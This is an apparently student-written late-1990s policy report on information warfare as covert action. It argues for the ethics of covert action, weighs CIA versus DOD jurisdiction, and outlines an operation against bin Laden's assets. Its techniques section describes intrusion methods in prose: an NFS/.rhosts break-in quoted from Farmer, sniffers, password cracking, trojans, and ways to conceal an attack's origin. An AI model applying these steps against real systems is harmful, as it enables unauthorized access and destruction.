Table of Contents:
Executive Summary: Information Warfare
This report begins by tackling the broad issue of whether covert action is a morally acceptable tool of U.S. foreign policy. In constructing a utilitarian justification of covert actions, the paper examines the efficacy of covert actions vis-a-vis other policy options. The paper then tackles the thorny issue of which government agency should have jurisdiction over IW, examining the qualifications of the Central Intelligence Agency (CIA) and the Department of Defense (DOD). Next, the paper delves into the more technical aspect of information warfare, discussing a subset of the most common techniques employed. Finally, the paper proposes a hypothetical application of an IW covert operation targeting Osama bin Laden.
When considering whether covert action is morally justifiable, one can either take a deontological or a utilitarian approach. A deontologist might condemn covert actions by upholding the preservation of democratic ideals, such as transparency of motive, as the highest good. Thus, even if a covert action saves lives, it is still immoral. However, the utilitarian approach is more persuasive. A covert action can only be judged relative to the other policy options. Imagine the abstract situation in which a hostile entity threatens the national interest of the United States. Assuming that aggression is justified, the U.S. can either utilize covert action or overt action. Empirically, covert actions can save both American lives and the lives of enemy civilians. Furthermore, covert action does not violate democratic ideals because the Congressional Oversight system allows the people representation in the form of the Select Intelligence Committees.
The next issue addressed is a practical one: which government agency should control information warfare covert operations? There are really only two viable options: the DOD and the CIA. The DOD’s current superiority in IW techniques and the need for quick transitions from peacetime intelligence to wartime intelligence dictate that, without a doubt, the DOD should retain its wartime IW capability. However, the CIA should have jurisdiction over IW covert operations. First, only the CIA has an established and proven system of accountability, which is essential for the justification of any covert action. Furthermore, many IW covert operations will target international criminals such as narcotics traffickers. The DOD’s organizational mission is to protect the physical security of America, not necessarily to fight the war against drugs. Thus, the DOD, in a situation of limited resources, might neglect the fight against international criminals in favor of spending more money on military operations.
The numerous techniques of information warfare, many of which are developed by civilian "hackers", preclude a complete discussion of tactics. First, this paper provides a brief overview of networks. Then, it explains denial of service attacks, in which a hacker incapacitates the target computer by flooding it with information. Next, it talks about exploiting the various security holes in the Unix operating system in order to gain unauthorized access into a network. The report then explains how infiltration of a single computer can lead to the subversion of the entire network. Lastly, the report discusses the variety of attacks that can be executed once access is gained, including viruses, worms, and Web spoofing. Note that all of these methods are routinely used effectively by hackers.
Finally, this report develops a hypothetical information warfare covert operation targeting Osama bin Laden. U.S. operatives have situated a satellite directly above bin Laden’s hideout, enabling them to intercept his cellular and satellite phone calls. Furthermore, bin Laden’s captured accomplices have provided information regarding his financial assets. The hypothetical covert action would entail freezing or eliminating bin Laden’s assets. This could be accomplished by using IW techniques to infiltrate the rogue banks providing haven for bin Laden and subsequently depleting his accounts in these banks. The report concludes that this operation is quite feasible and could remain covert.
Information Warfare Covert Actions:
Efficacy, Jurisdiction, Techniques, and Applications
"For to win one hundred victories in one hundred battles is not the acme of skill. To subdue an enemy without fighting is the acme of skill."
U.S. policy makers have always turned to covert actions in the hope of defeating adversaries without overtly engaging them. And, to a certain extent, covert action has fulfilled its promise over the past fifty years. Now, at the turn of the millennium, scholars and civil servants are critically reexamining covert action. Is covert action an appropriate tool of foreign policy? Can it adapt to the changes associated with the Information Revolution? If so, who should be responsible for this new breed of covert operations?
This report begins by tackling the broad issue of whether covert action is a morally acceptable tool of U.S. foreign policy. In constructing a utilitarian justification of covert actions, the paper examines the efficacy of covert actions vis-a-vis other policy options. The paper then tackles the complex issue of which government agency should have jurisdiction over IW, examining the qualifications of the Central Intelligence Agency (CIA) and the Department of Defense (DOD). Next, the paper delves into the more technical aspect of information warfare, discussing a subset of the most common techniques employed. The paper then proposes a hypothetical application of an IW covert operation targeting Osama bin Laden. Finally, the paper provides several policy recommendations regarding information warfare covert actions.
Utility of Covert Action in Post Cold War Era
As our task force analyzes the history of the CIA, it is clear that the agency has committed numerous fundamental errors both in planning and in implementing past covert operations. However, these debacles, such as the Bay of Pigs, do not prove that covert operations are inherently unwise. Rather, they highlight particular errors in judgment made by the CIA. Fortunately, analyzing these failures allows us to formulate a set of guidelines that will ensure a high probability of success in future missions. Specifically, a covert operation:
By adhering to these heuristics, the U.S. will endow itself with a powerful policy option.
In the post Cold War era, avoiding open warfare is extremely important because the widespread proliferation of weapons of mass destruction and international terrorism enable even the smallest countries or groups to exact a punishing revenge from the U.S. Covert action, by definition, is an action somewhere between peacetime diplomacy and outright aggression. There are obviously certain situations in which utilizing covert operations is the most effective policy option. For instance, when the U.S. national interest conflicts with the interest of another nation or group but the conflict does not merit a declaration of war, executing a covert action can prevent open hostilities. If properly performed, the operation will accomplish U.S. objectives. It will also leave no evidence of U.S. involvement, making it difficult for the victim to justify counter-attack against the U.S.
Information warfare (IW) has the potential to become one of the most decisive forms of covert action in the 21st century. IW, in the context of covert action, means using computers for information obstruction, information exploitation, and systems destruction. The post Cold War period coincides with the most innovative technological era in history. The worldwide network of computers known as the Internet is doubling its traffic every hundred days. Of course, such rapid growth is accompanied by growing pains in the form of rampant security vulnerabilities. Computer product cycles have been compressed to the point where exhaustively checking for security flaws in products is infeasible. In addition, the world is increasingly reliant upon computers and networks. It is not an exaggeration to say that all countries and major organizations depend on computers and networks for critical activities. These concurrent trends of security holes and widespread reliance dovetail nicely to provide an attractive target for covert operation attacks. Thus, as the world’s reliance on global electronic networks increases, its vulnerability to IW increases commensurately.
In addition, IW is conducive to covert operations because it naturally adheres to the three aforementioned guidelines governing all covert actions. First, covert IW operations can easily conceal the role of the U.S. government. The remote nature of an IW attack means that there is rarely any human contact involved. Furthermore, an IW operation usually entails either hijacking or destroying an enemy computer. Thus, records of the attack often can be modified to hide the U.S. presence or completely destroyed. Finally, and most importantly, because so many independent hacker groups exist worldwide an IW attack will not immediately cast suspicion on the U.S.
IW operations also meet the short duration criterion. IW attacks involve a great deal of planning in order to avoid detection. However, the actual execution of an IW attack can be as brief as is desired. For instance, a typical attack might involve stealing a password file, spending several hours decrypting it, and subsequently logging into the computer with the compromised passwords. At this point, the computer could easily be destroyed within a matter of seconds. Alternatively, the attacker could log in and steal information intermittently for an indefinite period of time. Or, the attacker could install a program on the victim computer which automates the information gathering and removes itself and all traces of its existence after a set period of time.
Finally, IW can be consonant with U.S. foreign policy. Like any other weapon, if the President uses IW wisely, it can reinforce existing policy. Obviously, there is a potential for abuse, but this drawback is not unique to IW; it is a problem for any type of covert operation.
In conclusion, covert operations continue to provide a valuable policy option to the U.S. In fact, the lessons learned from past failures will ensure future success. As nations and corporations increase their reliance on the global communications network, many traditional classes of covert operations, such as paramilitary attacks, will become unnecessary and/or irrelevant. By developing expertise in IW, the U.S. will endow itself with an incredibly potent weapon.
Moral Justification for Covert Action
Justifying covert action in a vacuum is difficult; the argument inevitably invokes utilitarian principles by claiming that covert action saves lives. Thus, the previous section demonstrating the utility of covert action is an important backdrop for this section. Although covert action is a valuable tool, many people who support overtly declared war have moral objections to its use. The underlying idea is that covert action unnecessarily excludes the populace from the decision making process. However, this argument is flawed. Assume that an entity is engaging in activities that directly threaten the U.S. national interest, that diplomatic efforts have failed, and that some action must be taken. Then, there are only two scenarios for remedying the situation.
First, the U.S. could publicly declare its intention to take action against the enemy and proceed to do so. The advantage of this approach is that there is public dialogue regarding the rationale for attacking the enemy. The largest drawback is that the U.S. effectively forewarns the enemy of the impending attack, reducing the probability of success and likely endangering the lives of U.S. agents. In addition, publicly announcing our hostile intentions might arouse the ire of the international community, possibly causing repercussions in the United Nations.
The other option is for the U.S. to mount a covert operation against the enemy. The key advantages to this approach are that the element of surprise dramatically increases the probability of success and reduces risk to American agents and that the likelihood of immediate retaliation is mitigated. There are two disadvantages to this approach. First, ethically, it is inconsistent with democratic ideals not to consult the populace. Second, practically, making the realistic assumption that evidence of U.S. involvement will eventually become public, the standing of the U.S. in the international community might be more adversely affected by this "underhanded" behavior than it would be by a transparent, overt attack.
Practically speaking, the covert option is superior. The only practical policy drawback to covert action is the preceding argument regarding U.S. standing in the international community. However, the international community already expects such behavior from the U.S., so U.S. standing will not be drastically affected. Widespread knowledge of U.S. actions in Guatemala in the 1950’s, Cuba in the 1960’s, Chile in the 1970’s, and Nicaragua in the 1980’s have trained the international community to expect the U.S. to engage in covert action. Moreover, this argument falsely assumes that the nature of the covert and overt operations would be identical. Precisely because a covert operation has the element of surprise, ancillary casualties will likely be lower and less overall force will be used relative to an overt operation. The smaller scale of the covert mission will not anger the international community as much as the overt operation would. It is clear, then, that to save American lives and to preserve U.S. prestige in the international community, the secrecy of covert operations is necessary.
Moreover, the CIA’s covert action accountability structure does allow for adherence to the democratic process, albeit in a limited form. The involved approval process requires thorough knowledge and support both from the executive and legislative branches of government. So, although the public is not informed of the covert operations, their elected representatives and elected president make this decision for them by proxy. This process ideally represents the best of both worlds: it preserves both the secrecy necessary for a successful mission and the accountability required for a healthy democracy.
In sum, the moral justification for covert operations has two essential components. First, covert action can achieve objectives with fewer casualties and less damage to the U.S. international standing than an overt action would entail. Second, covert action is justified because the current accountability process adequately adheres to the democratic process. Note that this implies that some past covert operations were not necessarily justified because such a structure did not exist at that point. It also implies that any covert action performed by an agency other than the CIA might not be ethically justified because the accountability structure does not apply to them.
Jurisdiction of IW: DOD or CIA?
Argument for DOD: Efficiency
Having showed that information warfare can serve an essential function in the post Cold War era and that covert action in general is ethically justified, the next logical issue is deciding which organization should control IW covert operations. There are two realistic options: the CIA or the Department of Defense (DOD). Not surprisingly, this decision entails a tradeoff between efficiency and accountability.
The DOD has amassed far more expertise in IW than has the CIA. IW is a relatively new practice; the U.S. first used it extensively early in the 1990’s, during the Gulf War. The DOD had sole responsibility for this wartime application of IW, and gained valuable experience. The CIA also has some IW capabilities; however, they are not nearly as powerful those of the DOD. Furthermore, the 1990’s have been politically turbulent for the CIA. The Aldrich Ames spy scandal, Senator Torricelli’s accusations that the CIA sponsored executions in Guatemala, and the controversial San Jose Mercury News series linking the CIA to drug dealers in South Central Los Angeles all have eroded popular support for the Agency. Thus, it is difficult for the CIA to obtain either new funding or new areas of responsibility.
With neither the mandate to commandeer the U.S. IW capabilities nor the resources to develop in-house expertise, the CIA has fallen behind the DOD in IW. Thus, continuity and efficiency would dictate that the realm of IW be assigned to the DOD.
Furthermore, there is significant crossover between the peacetime and wartime applications of IW. A peacetime IW covert operation and a wartime military IW operation are very similar in their attack methodologies. In both cases, security vulnerabilities are exploited to gain unauthorized access to enemy computer networks. The only technical difference between a peacetime IW attack and a wartime IW attack is the amount of damage inflicted. For instance, an IW covert operation might steal information about an air traffic control network, whereas a wartime IW operation might destroy the air traffic control network. This can be reduced to a policy decision, however. Minimal extra effort is required to destroy a network rather than steal its information. Thus, the IW operations are homogeneous; having one agency responsible for all IW operations, covert and overt, would eliminate duplication of effort.
Moreover, a successful war effort requires the swift integration of the resources of peacetime and wartime intelligence agencies. Historically, turf battles between intelligence agencies during wartime have been extremely counterproductive and actually cost lives. For example, during the Vietnam War, the CIA and DOD each constantly tried to assert their superiority in intelligence collection. The result was duplication of effort and inter-agency hostility. World War II saw a more disturbing grievance. The Army and Navy intelligence agencies insisted on decrypting intercepted electronic transmissions on alternate days and presenting it to President Roosevelt. The result was a lack of coherence in the overall picture provided to the president that hindered his ability to make wise decisions.
The post Cold War era places ever more demands on swift integration of military capabilities. The best example of this is the Gulf War, which lasted less than one week. There was literally no time to adjust intelligence structures from "peacetime" to "wartime" mode. Rather, they had to be prepared to act immediately. And, in fact, one of the reasons that IW was so effective in the Gulf War is that it was fully integrated with the rest of the war effort; the DOD had complete control over all IW and traditional warfare operations.
In any event, no matter which agency assumes responsibility for covert operations, it is clear that the DOD must retain a wartime IW capability for the U.S. armed forces to remain superior. Given that the DOD must have a wartime IW capability and that IW covert operations and IW military operations are nearly identical, it would be most efficient for the DOD to assume responsibility for all IW.
Argument for CIA: Accountability & National Interest
The above conclusion could justify eliminating the CIA and allowing the DOD to control all intelligence activities. After all, if the DOD performed all covert actions, then the transition from peace to war would be very smooth. Clearly, though, this is not entirely desirable; otherwise, the National Security Act of 1947 would not have been signed and the CIA would not exist. The CIA was created specifically to prevent the armed forces from being excessively active during peacetime. One key difference between CIA and DOD operations is their respective accountability structures.
Before a CIA lethal operation (one which may entail loss of life) is carried out, it must go through an extensive approval process. If the operation is rejected at any step, it must begin the process anew. First, the President must ask for a finding establishing the need for a covert action. Then, the Operations Directorate designs a covert operation to remedy the problem articulated in the Presidential finding. The next step is a review by the Covert Action Planning Group, chaired by the Deputy Director of Operations (currently Jack Downing). The final internal CIA review involves the DCI and all four deputy directors.
After the CIA reviews the operation, it is sent to the White House. There, representatives from 13 executive agencies will discuss the plan’s viability. The first committee is the Interagency Working Group. Representatives from the Department of Justice, the National Security Council (NSC), the State Department, and other agencies must give approval. Next, the NSC Deputies Committee, which includes the deputy National Security Adviser (NSA), Undersecretaries of State and Defense, and Deputy DCI among others, reviews the plan. Finally, the NSC Principals Committee, which includes the Vice President, NSA, Secretary of State, Secretary of Defense, DCI, and Chairman of the Joint Chiefs, evaluates the operation. If all of these committees approve, then the President signs off and informs Congress. This can either involve telling the Senate Select and House Permanent Select Committees on intelligence or, if the operation is sensitive, telling the "gang of eight." Technically, Congress must simply be informed of covert operations. However, because Congress controls funding for the CIA, it effectively can veto an operation of which it disapproves.
In contrast, there is no established accountability structure for DOD covert operations precisely because this is not supposed to be its responsibility. Clearly, the President must approve a DOD covert action because he is the commander-in-chief of the armed forces and thus the superior of the Secretary of Defense. However, the ambiguity surrounding the role of agencies other than the CIA in covert action played a key role in the Iran Contra affair. After Congress passed a law prohibiting CIA aid to the Contras, the CIA’s accountability structure precluded it from participating in illicit aid. However, the National Security Council staff had no correspondingly explicit restrictions. Thus, President Reagan allegedly either directly or indirectly told Oliver North, a NSC aide, to continue helping the Contras despite the illegality of the action. Allocating responsibility for IW, a subset of covert action, to the DOD might lead to a similar abuse of power.
In addition to providing a superior accountability structure, assigning the CIA to IW covert operations also better serves the national interest. The Department of Defense’s mission is "to provide the military forces needed to deter war and to protect the security of our country." This encompasses all wartime operations in addition to peacetime operations against terrorists and nuclear weapons proliferators. It noticeably excludes operations against many criminal organizations because they do not pose a direct threat to U.S. security. However, it is clearly in the national interest of the U.S. to take action against narcotics organizations. Thus, the DOD’s priorities do not completely encompass all threats to the U.S. national interest.
Obviously, it is best to assign a task to an agency that has a strong desire to accomplish the task. The CIA’s mandate is broader than that of the DOD; it includes "conducting counterintelligence activities, special activities, and other functions related to foreign intelligence and national security as directed by the President." For instance, the CIA has cooperated closely with the Drug Enforcement Agency (DEA) to fight narcotics traffickers. The danger in assigning covert IW operations to the DOD is that certain operations in the national interest will not be given the appropriate priority. For instance, were there limited financial resources, the DOD would be reluctant to divert funds from a military IW operation to an IW operation against international criminals. Although the DOD ultimately reports to the President and thus hypothetically should prioritize according to the national interest, the bureaucratic reality may be otherwise.
In conclusion, there are two distinct advantages to assigning IW covert operations to the CIA. First, the CIA has a more comprehensive system of checks on covert operations than does the DOD. The current system is effective only because all covert operations occur through CIA; when this rule is breached, incidents like the Iran Contra affair can occur. Second, giving responsibility for IW to the DOD will necessarily lead to the neglect of certain facets of national security, such as fighting crime in general and narcotics in particular. A division of IW responsibility between the CIA and the DOD would remedy this problem.
Techniques of Information Warfare
This paper will not attempt to enumerate exhaustively every IW tactic; that is not feasible given the limited space available. Rather, it will summarize several important techniques in the context of covert action. First, it will discuss denial of service attacks, which cripple a network. Then, most importantly, it will explain how to break into computers in networks. Finally, it will discuss what damage can be done once the network security is breached.
Introduction to Networks
Before doing so, however, a brief discussion about the nature of networks is appropriate. A network of computers consists of multiple computers connected to each other via physical communications equipment, such as fiber optical lines. The rationale for a network is that it allows computers to access each other’s resources, and the resulting whole is greater than the sum of its parts. The network concept itself is not new; it has existed in primitive forms since the advent of mainframe computing early in the 1950’s.
Broadly speaking, there are two types of networks: private networks and public networks (see attached diagram). In a private network, each member computer can access and be accessed only by another member computer. For example, if a company connects five computers together but does not connect them to a phone line or to any outside network, these five computers constitute a private network. If a hostile, external party wishes to attack this network, they must physically break into the room housing the computers. Thus, private networks are completely secure from IW tactics. However, there are very few pure private networks because not being able to connect to the Internet is a huge drawback.
A public network is a larger version of a private network that contains various sub-networks. The best example of a public network is the Internet itself. It is a conglomeration of government, corporate, and independent networks that interact with each other. The networks which covert operations would exploit are usually a hybrid between public and private networks. They consist of private networks that can access the Internet through a firewall.
The idea behind a firewall is to route all external traffic through one specific computer or gateway (see attached diagram). For example, if a computer inside the firewall wishes to access a computer on the Internet, it will send the request to the gateway computer, which will relay the message to the external computer. When the external computer responds, it will send its message to the gateway computer, which will forward the message to the original internal computer. The point is that an external computer cannot access an arbitrary computer inside the firewall, but rather must go through the gateway. Without a firewall, breaking into the network would only be as difficult as breaking into the most insecure computer on the network. With a firewall, theoretically, an attacker must break into the gateway in order to compromise the network; the gateway is usually the most secure computer on the network.
Denial of Service Attacks
One method for crippling a firewall network is a denial of service attack, which attacks the gateway computer. The attacker initiates the attack by sending many small packets of information to the target computer. The target computer interprets each of these packets as a request for a new connection. Unfortunately, the target computer can handle only so many requests simultaneously, and these small packets quickly fill up the queue. Thus, any legitimate computer that is trying to talk to the target will be disconnected. Unidentified hackers perpetrated this type of attack against a New York City Internet Service Provider (ISP) named Panix in 1996. The hackers had to be clever to avoid being caught. Every packet of information sent is supposed to contain information about who sent it. However, the hackers used a technique called "IP spoofing" to forge the sender information.
However, it is sometimes possible to trace these attacks (see attached diagram). This stems from the fact that when the attacker sends a packet to the target, the packet does not go directly to the target. Rather, the packet is usually sent through several different computers before reaching its final destination. So, in addition to containing the original sender’s identity, every packet also contains the identity of the last computer it visited. For example, say computer W is attacking computer Z with a high bandwidth denial of service attack. W sends the packet to Z, but it does not go directly to Z. It first goes from W to X, then to Y, then to Z. W changes the packet to say that the sender is another computer, say computer F. When Z receives the packet, there are two important pieces of information: the last computer it visited was definitely Y and the original sender was allegedly F.
If this packet is part of an attack, then Z will try to trace the packet to the original sender. Z knows that the sender identity was probably false, but it also knows that the information about the last computer visited is definitely true because it cannot be maliciously altered. So the owner of Z can contact the owner of Y and ask which computer sent the packet to Y. If Y cooperates, he will say that X sent the packet to Y. Then, the owner of Z can go to X and ask which computer sent the packet to X and find out that computer W sent the packet.
W, of course, is the actual attacker. When Z contacts W, W has several options. It can say that it never sent the packet, implying that Y lied to Z when it said that W had sent it the packet and thus that Y might be the actual attacker. Or, W could lie and say that some arbitrary computer R sent it the packet. Of course, when Z contacts R, R will correctly claim ignorance of the matter. So, no matter what, suspicion is cast on computer W, the actual attacker. No matter what W says, Z has narrowed the culprit down to W or Y in the first case or to W or R in the second case. In the case of Panix, certain computers which were located along the route of the attack (the equivalent of computers X and Y in the example) refused to cooperate with the investigation. Thus, Panix could not fully backtrack to the attacker, W.
A covert operation, however, could take measures to conceal its identity. First, the U.S. government could forge a secret agreement with a major U.S. corporation such that this corporation would refuse to cooperate with the victim of the attack as it searched for the perpetrator. For instance, suppose that an American covert IW team needs to interdict a financial transaction between a drug cartel and an offshore bank that will occur via the Internet. It could use a denial of service attack to overload and shut down the offshore bank’s web server, thereby stopping the drug cartel’s transaction. The IW team could route all of its packets through AT&T’s computers at some point along the path to the bank’s computer. Thus, when the bank tries to backtrack the packets, AT&T will simply not cooperate and the bank will not know who the attacker was.
Additionally, the covert action team could obtain a computer account with phony information. When the attack is completed, this phony account can be closed. Thus, even if the bank were to manage to trace the attack back to this account, they would find bogus identifying information and not be able to do anything about it. This phony account need not be located within the U.S.; it could be anywhere in the world.
Unauthorized Login into Systems
Whether targeting a gateway computer or a computer behind the firewall, the techniques for gaining unauthorized access are virtually identical. Essentially, all security breaches are attributable to software or hardware defects. Some of these defects are well known and have been fixed; others are more subtle and known by only a few skilled hackers. Most large networks connected to the Internet utilize an operating system known as Unix. For example, Princeton University’s web servers, email servers, and ftp (file transfer protocol) servers are all run from Unix machines. Unix has been extensively used for over thirty years, so most of its flaws are well known.
That said, it is relatively simple to hack into a Unix system. The first step, as usual, is to gain information about the target system, this time by using the Unix utility "finger." In his paper titled "Improving the Security of Your Site by Breaking into it," Dan Farmer, author of SATAN and a respected security expert, explains finger:
As every finger devotee knows, fingering "@", "0", and "", as well as common names, such as root, bin, ftp, system, guest, demo, manager, etc., can reveal interesting information. What that information is depends on the version of finger that your target is running, but the most notable are account names, along with their home directories and the host that they last logged in from…Both our experiments with SATAN and watching system crackers at work have proved to us that finger is one of the most dangerous services, because it is so useful for investigating a potential target. However, much of this information is useful only when used in conjunction with other data.
Essentially, finger is not dangerous in and of itself; rather, it provides hackers with information necessary to perpetrate attacks.
The first security hole to exploit is NFS (network file system). This attack will work only if the network security settings are lax. The purpose of NFS is to allow any computer on a network to treat other computers’ hard disks as if they were directly connected to that computer. However, if a computer exports, or shares, its hard disk with all other computers, then an attacker can gain access. Farmer explains:
Note that /export/foo is exported to the world; also note that this is user guest's home directory. Time for your first break-in! In this case, you'll mount the home directory of user "guest." Since you don't have a corresponding account on the local machine and since root cannot modify files on an NFS mounted filesystem, you create a "guest" account in your local password file. As user guest you can put a .rhosts entry in the remote guest home directory, which will allow you to login to the target machine without having to supply a password.
The information from finger and similar programs can be used to attack Unix features other than NFS as well. For example, NIS (network information system), FTP (file transfer protocol), tFTP, and sendmail are installed on almost every Unix machine, and each one has numerous security holes. For instance, NIS still has uncorrected problems. Farmer writes that "there aren't many effective defenses against NIS attacks; it is an insecure service that has almost no authentication between clients and servers… Better to use NIS as little as possible, or to at least realize that the maps can be subject to perusal by potentially hostile forces."
One potential application of this technique is thwarting other countries’ attempts to violate the Non-Proliferation Treaty (NPT). For example, in May 1998, India defied the NPT by successfully testing several nuclear devices. Nuclear testing is heavily dependent on computer networks, both for the actual detonation and for collection and analysis of data from the explosion. Furthermore, if the Indian nuclear research facility is somewhat similar to research facilities in the U.S., then it contains some Unix computers with connections to the Internet. A U.S. covert IW team could have exploited NFS, NIS, or other security flaws in one of the Indian Unix machines to gain access to their network. Subsequently, the IW team could use the techniques in the following section to gain unauthorized access into computers critical for the detonation process.
Leveraging Unauthorized Login to Subvert Entire Network
Once logged into the target system, the hacker can effectively compromise other computers on the network. As a background for this section, different users on the network have different levels of permission. The "root" account on a given computer X has access to do anything to that computer X. Furthermore, if other computers on the network trust computer X, then the root account on X can do anything to those other computers as well. If enough root passwords for different computers are accumulated, the entire network can be subverted.
There are several common ways of accomplishing this. First, a hacker can install a packet sniffer program on the first compromised computer (see attached diagram). Christopher Klaus of Internet Security Systems writes that
Unlike telephone circuits, computer networks are shared communication channels. It is simply too expensive to dedicate local loops to the switch (hub) for each pair of communicating computers. Sharing means that computers can receive information that was intended for other machines. To capture the information going over the network is called sniffing.
For example, if computer A wants to send a message to computer B, it sends a packet addressed to B over the network. Computers C, D, E, etc. receive the packet as well, but normally ignore it because it is not intended for them. However, a packet sniffer on computer C will listen to the packet intended for B. Specifically, it will listen to and record any packets that contain passwords.
Sniffing is a very common attack both because sniffer programs are widely available and because it is extremely effective. Klaus writes:
One special sniffer, called Esniff.c, is very small, designed to work on SunOS, and only captures the first 300 bytes of all telnet, ftp, and rlogin sessions. It was published in Phrack, one of the most widely read freely available underground hacking magazines. You can find Phrack on many FTP sites. Esniff.c is also available on many FTP sites such as coombs.anu.edu.au:/pub/net/log.
The idea is to start with access to one password, get root access to another computer, and install another packet sniffer on the new computer. This process is repeated until all root passwords are collected. This process often occurs quite rapidly.
In addition to sniffer programs, hackers often attempt to crack password files. Once logged into a given computer, a hacker has only one password and thus often cannot use the root account. To remedy this, the hacker can "crack" the password file, which stores every user password for the computer, including root.
Your main concern is to crack each encrypted password for user. Because the encryption function is only unidirectional, you cannot decrypt the encrypted password. You must run a cracking program which encrypts words then compares the encrypted word with the password. If they match you now have cracked the password.
As with packet sniffing programs, password crackers are freely available on the Internet.
Returning to the example of the Indian nuclear research facility’s computer network, the covert IW team could install a packet sniffer on the first compromised computer. This would yield passwords to more powerful computers. Additionally, the team could attempt to crack the password file on the compromised computer. In either case, the team could gain access to the computers responsible for detonating the nuclear test device. At this point, the team could erase the hard drives from these computers, setting back the Indian team several months.
Gaining Access via Trojan Horse
A "Trojan horse" is a program that appears harmless but actually compromises the network in some manner. Specifically, it is "a program that performs some undesired yet intended action while, or in addition to, pretending to do something else." There are two categories of Trojan horse attacks that hold promise for covert action. First, an insider with malicious intentions exploits his position of trust within the organization to plant a Trojan horse program within the network. When the insider has left the company at a later date, he still can access the network.
This is precisely what happened to Citibank. A group of hackers in St. Petersburg, Russia, broke through the bank’s security systems and started to siphon out money to accounts in San Francisco, Amsterdam, Germany, Finland and Israel. In the end all but $400,000 was recovered from the $10 million heist…An attack of this magnitude was made possible by the fact that some of the hackers had worked in Citibank affiliates for three years and had carefully seeded the computers with ‘backdoor’ programs that let them into the system when requested.
Ignorance of information has threatened America’s financial infrastructure. For example, "the Soviets had infected Wall Street with a virus that would have taken down the banking system in the event of war." This seems less farfetched upon learning that "98% of the banks that were company clients (of SAIC security firm) had employed Russian computer experts who had left their home country after the end of the Cold War."
More dangerous than an insider planting a Trojan horse is the computer manufacturer including such a backdoor program. The U.S. has a tremendous opportunity for covert action in this arena. American companies such as Silicon Graphics/Cray, Sun, and Digital Equipment produce a majority of the world’s high performance computers. In The Next World War, author James Adams imagines a scenario in which the U.S. government arranges for the sale of infected systems to countries such as Iran, China, and Saudi Arabia. When widespread conflict seems imminent, the U.S. is able to thwart it by triggering these Trojan horse programs and bringing these countries to their knees.
In fact, the U.S. has actually utilized such techniques in the past with considerable success.
There had been considerable success at planting viruses inside the Soviet military-industrial structure that could be activated in the event of war. The CIA had also been able to plant bugs inside computer systems to feed back via satellite information that had been leeched off hard drives in the Soviet Defense Ministry and elsewhere.
In addition, during the Gulf War, the NSA, CIA, and Britain’s Government Communication Headquarters attempted to implant infected computer hardware into Iraq’s communications network. "It turned out that Saddam had bought most of his computers in the West and that they could be successfully penetrated…Finally, the decision was made to insert some hardware into a cargo of computer equipment…destined for the Iraqi military." The tainted computers contained in the cargo shipment would literally destroy Saddam’s communication network. Unfortunately, the plan came to fruition, "the air war began…and one of the first targets destroyed was the very building where the infected computer hardware had been so carefully inserted."
Options for Harming Enemy Computers
Once network access is gained through the aforementioned methods, the hacker can undertake a variety of actions. The simplest method is a traditional slash and burn approach in which data is manually deleted. However, there are more subtle and damaging ways to wreak havoc on the enemy. For example, the hacker can install a computer virus on the enemy system (see attached diagram). A computer virus is "executable code that, when run by someone, infects or attaches itself to other executable code in a computer in an effort to reproduce itself." The most widely publicized virus is Michaelangelo, which, "if the current date is the 6th of March…will systematically proceed to destroy all data on the infected disk." A computer virus is extremely useful because it can be customized to activate under specific circumstances. For example, a hacker could plant a virus on an enemy computer which sends information back to the hacker until the virus is discovered by the enemy, at which point the virus destroys all of the enemy computer’s data. Such a virus, if written correctly, preserves the hacker’s anonymity.
If the goal of a hacker is to incapacitate an enemy network quickly, installing a "worm" is quite effective (see attached diagram). "A worm is a program that propagates itself across a network, using resources on one machine to attack other machines. (A worm is not quite the same as a virus, which is a program fragment that inserts itself into other programs.)" Essentially, a virus depends on another program to spread and is thus very difficult to detect; a worm can spread autonomously but is more easily noticed. The best example of a worm is the Internet Worm, created by Robert Tappan Morris, who was the son of the former Chief Scientist of the National Security Agency and was at the time a 23-year-old doctoral student at Cornell University.
On the evening of November 2, 1988, a self-replicating program was released upon the Internet (1) This program (a worm) invaded VAX and Sun-3 computers running versions of Berkeley UNIX, and used their resources to attack still more computers (2). Within the space of hours this program had spread across the U.S., infecting hundreds or thousands of computers and making many of them unusable due to the burden of its activity.
Although the Internet Worm did not do so, it is possible for worms not only to consume processor resources but also to destroy data on infected computers. Worms, like viruses, are customizable. For instance, a worm could be synchronized so that every computer in the network is destroyed at once.
For example, if a covert IW team were able to penetrate the computer network of an international arms dealing organization, it could deliver a customized computer virus. The virus could maliciously alter the inventory data, causing the arms dealers to promise to deliver more weapons than they actually owned. The virus could also cripple the ability of the computers to perform financial transactions. Or, to be less subtle, the virus could erase the hard drives of every computer in the network simultaneously, destroying years’ worth of data.
Potential Application of Information Warfare
Counterterrorism: Osama Bin Laden
Terrorism continues to be one of the greatest post Cold War threats to U.S. national security. The collapse of the Soviet Union and the lack of security surrounding its military arsenals have created an international weapons black market. Wealthy terrorists can purchase weapons like Semtex, a powerful explosive, biological warfare agents, Stingers, which are anti-aircraft weapons, and possibly even fissile material which could be used to create nuclear devices. For example, "investigators suspect the deadly explosive Semtex was used in the attacks on the U.S. embassies in Kenya and Tanzania."
Since ascertaining Osama bin Laden’s involvement in the recent U.S. embassy bombings in Africa, bin Laden has became the primary target of U.S. counterterrorist forces.
Intelligence sources have linked him to dozens of attacks, including the American embassy bombings of two weeks ago, the 1993 World Trade Center Bombing, the 1995 bombing in Riyadh, Saudi Arabia, in which five U.S. service personnel died, and the truck bombing in Dhahran, Saudi Arabia, the following year, in which 19 American soldiers perished.
Bin Laden’s role as mastermind entails designing the terrorist attacks, delegating their implementation to various members of his group, and most importantly, funding them by purchasing necessary materials and equipment.
Osama bin Laden’s true utility to the terrorist movement is his personal fortune, estimated at $250 million.
Take away Mr. Laden's estimated $1 billion in oil inheritance, the theory goes, and all he would have left is his anger. ‘He himself doesn't have the intestinal fortitude to commit an act of terrorism,’ says Buck Revell, a former counterterrorism expert for the FBI and now a security consultant in Dallas. ‘He doesn't have the religious affiliation of (Iran's Ayatollah) Khomeini. He doesn't have the political clout of (Palestinian terrorist) Abu Nidal. So if you take away his money, he would be just an ordinary radical. Almost a nonentity.’
His threats to retaliate against the U.S. air strikes targeting Sudan and bin Laden’s base in Afghanistan have created a sense of urgency as the U.S. government tries to freeze his assets. "The Clinton administration has launched a concerted effort to track down and freeze the financial resources of Saudi multimillionaire Osama bin Laden." This task will not be trivial.
There are several obstacles to incapacitating bin Laden financially. First, bin Laden hides his assets in a complicated array of holding companies.
